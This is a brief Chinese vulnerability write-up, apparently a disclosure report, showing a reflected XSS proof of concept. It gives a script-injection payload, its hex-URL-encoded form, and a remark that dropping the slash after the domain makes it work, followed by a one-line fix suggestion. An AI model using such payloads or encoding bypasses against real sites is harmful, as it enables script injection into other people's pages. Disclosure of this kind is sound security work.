构造新代码
</a><a><script>alert('xss')</script></a>
然后16进制加密得到
%3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e
发出去,结果行不通
删除域名后面的/,再试试,涛涛电脑知识网,看效果吧
%3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e
修复方案:
亲,涛涛电脑知识网,要屏蔽啊!